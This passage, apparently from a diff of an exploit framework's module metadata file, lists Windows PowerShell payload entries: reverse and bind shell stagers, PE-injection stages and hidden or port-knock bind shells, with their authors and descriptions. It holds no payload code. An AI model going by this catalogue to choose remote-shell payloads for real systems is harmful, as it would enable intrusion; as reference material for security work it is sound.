- "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/peinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/peinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/peinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/find_tag", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/peinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_named_pipe": { - "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/peinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/pingback_bind_tcp": { - "name": "Powershell Exec, Windows x86 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/pingback_reverse_tcp": { - "name": "Powershell Exec, Windows x86 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_bind_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_reverse_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_reverse_tcp_ssl": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/powershell/shell/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_hidden_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/bind_named_pipe": { - "name": "Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell 